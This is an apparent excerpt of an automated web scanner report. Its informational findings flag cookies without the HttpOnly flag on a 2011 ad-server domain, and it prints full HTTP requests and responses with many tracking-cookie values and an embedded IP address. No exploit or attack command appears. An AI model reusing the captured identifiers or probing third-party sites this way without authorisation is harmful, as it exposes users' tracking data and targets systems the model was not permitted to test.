Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses1=13209^2; csi1=3226251.js^2^1317599333^1317599350; ses2=13378^2&12566^1; csi2=3188003.js^1^1317599406^1317599406&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; rdk=7845/12566; ses15=13378^2&13209^2&12566^1; csi15=3188004.js^1^1317599406^1317599406&3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688; cd=false; lm="2 Oct 2011 23:50:10 GMT"

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:52:30 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7743/12359; expires=Mon, 03-Oct-2011 00:52:30 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 03-Oct-2011 00:52:30 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13378^2&13209^2]]>>&12566^46&12359^1; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=29249; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 3348

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3182366"
...[SNIP]...

14.165. http://optimized-by.rubiconproject.com/a/7743/12359/21900-2.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7743/12359/21900-2.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7743/12359/21900-2.js?cb=0.7007977575995028 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6393&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; lm="2 Oct 2011 23:50:10 GMT"; ses8=13209^1; csi8=3226247.js^1^1317599462^1317599462; ses2=13378^2&12566^2; csi2=3188003.js^2^1317599406^1317599882&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; ses15=13378^2&13209^3&12566^2&12359^1; csi15=3226249.js^3^1317599341^1317599886&3188004.js^2^1317599406^1317599881&2748761.js^1^1317599431^1317599431&3209195.js^2^1317595891^1317598688; ses1=13209^5; csi1=3226243.js^1^1317599890^1317599890&3226929.js^2^1317599456^1317599882&3226251.js^2^1317599333^1317599350; rdk=7743/12359; rdk9=0; ses9=12359^1; csi9=3154654.js^1^1317599933^1317599933

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:59:37 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7743/12359; expires=Mon, 03-Oct-2011 00:59:37 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 03-Oct-2011 00:59:37 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=13378^2&12566^2&12359^2; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=28822; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3226027.js^1^1317599977^1317599977&3188003.js^2^1317599406^1317599882&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; expires=Sun, 09-Oct-2011 23:59:37 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1808

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3226027"
...[SNIP]...

14.166. http://optimized-by.rubiconproject.com/a/7743/12359/21900-9.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7743/12359/21900-9.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7743/12359/21900-9.js?cb=0.09602085058577359 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; lm="2 Oct 2011 23:50:10 GMT"; ses8=13209^1; csi8=3226247.js^1^1317599462^1317599462; ses2=13378^2&12566^2; csi2=3188003.js^2^1317599406^1317599882&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; ses15=13378^2&13209^3&12566^2&12359^1; csi15=3226249.js^3^1317599341^1317599886&3188004.js^2^1317599406^1317599881&2748761.js^1^1317599431^1317599431&3209195.js^2^1317595891^1317598688; rdk=8154/13209; ses1=13209^5; csi1=3226243.js^1^1317599890^1317599890&3226929.js^2^1317599456^1317599882&3226251.js^2^1317599333^1317599350

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:59:37 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7743/12359; expires=Mon, 03-Oct-2011 00:59:37 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk9=0; expires=Mon, 03-Oct-2011 00:59:37 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses9=12359^2; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=28822; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 3332

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3182365"
...[SNIP]...

14.167. http://optimized-by.rubiconproject.com/a/7845/12566/22557-15.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7845/12566/22557-15.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7845/12566/22557-15.html? HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/manchester-united
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; cd=false; lm="27 Sep 2011 22:12:09 GMT"; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; csi2=3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; ses2=13378^2; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses1=13209^2; csi1=3226251.js^2^1317599333^1317599350; rdk=8154/13209; ses15=13378^2&13209^2; csi15=3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:51:05 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7845/12566; expires=Mon, 03-Oct-2011 00:51:05 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 03-Oct-2011 00:51:05 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13378^2&13209^149&12566^2&12359^1; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=29334; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3188004.js^2^1317599406^1317599465&3223117.js^3^1317599464^1317599464&3226249.js^10^1317599341^1317599463&2748761.js^1^1317599431^1317599431&3209195.js^2^1317595891^1317598688; expires=Sun, 09-Oct-2011 23:51:05 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1975

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...

14.168. http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7845/12566/22557-2.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7845/12566/22557-2.html? HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses2=13378^2&12566^1; csi2=3188003.js^1^1317599406^1317599406&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; cd=false; lm="2 Oct 2011 23:50:10 GMT"; csi15=2748761.js^1^1317599431^1317599431&3188004.js^1^1317599406^1317599406&3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688; ses15=13378^2&13209^2&12566^1&12359^1; ses1=13209^3; csi1=3226929.js^1^1317599456^1317599456&3226251.js^2^1317599333^1317599350; ses8=13209^1; csi8=3226247.js^1^1317599462^1317599462

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:58:02 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7845/12566; expires=Mon, 03-Oct-2011 00:58:02 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 03-Oct-2011 00:58:02 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=13378^2&12566^3; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=28917; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3188003.js^3^1317599406^1317599882&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; expires=Sun, 09-Oct-2011 23:58:02 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1971

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...

14.169. http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7845/12566/26848-15.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7845/12566/26848-15.html? HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses2=13378^2&12566^1; csi2=3188003.js^1^1317599406^1317599406&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; cd=false; lm="2 Oct 2011 23:50:10 GMT"; csi15=2748761.js^1^1317599431^1317599431&3188004.js^1^1317599406^1317599406&3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688; ses15=13378^2&13209^2&12566^1&12359^1; ses1=13209^3; csi1=3226929.js^1^1317599456^1317599456&3226251.js^2^1317599333^1317599350; ses8=13209^1; csi8=3226247.js^1^1317599462^1317599462

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:58:02 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7845/12566; expires=Mon, 03-Oct-2011 00:58:02 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 03-Oct-2011 00:58:02 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13378^2&13209^2&12566^3&12359^1; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=28917; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3188004.js^2^1317599406^1317599882&2748761.js^1^1317599431^1317599431&3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688; expires=Sun, 09-Oct-2011 23:58:02 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1975

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...

14.170. http://optimized-by.rubiconproject.com/a/8154/13209/25051-1.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/8154/13209/25051-1.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/8154/13209/25051-1.js?cb=0.5513019266072661&fr=false HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; cd=false; lm="27 Sep 2011 22:12:09 GMT"; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; ruid=154e62c97432177b6a4bcd01^8^1317595852^840399722; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; csi2=3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; ses2=13378^2; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ses15=13378^2; csi15=3209195.js^2^1317595891^1317598688

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:48:53 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=8154/13209; expires=Mon, 03-Oct-2011 00:48:53 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk1=0; expires=Mon, 03-Oct-2011 00:48:53 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses1=13209^2; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=29466; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi1=3226251.js^2^1317599333^1317599333; expires=Sun, 09-Oct-2011 23:48:53 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1423

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3226251"
...[SNIP]...

14.171. http://optimized-by.rubiconproject.com/a/8154/13209/25051-15.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/8154/13209/25051-15.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/8154/13209/25051-15.js?cb=0.1704533719457686&fr=false HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; cd=false; lm="27 Sep 2011 22:12:09 GMT"; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; csi2=3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; ses2=13378^2; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ses15=13378^2; csi15=3209195.js^2^1317595891^1317598688; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk=8154/13209; rdk1=0; ses1=13209^1; csi1=3226251.js^1^1317599333^1317599333

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:49:01 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=8154/13209; expires=Mon, 03-Oct-2011 00:49:01 GMT; max-age=60; path=/; domain=.rubiconproject.com
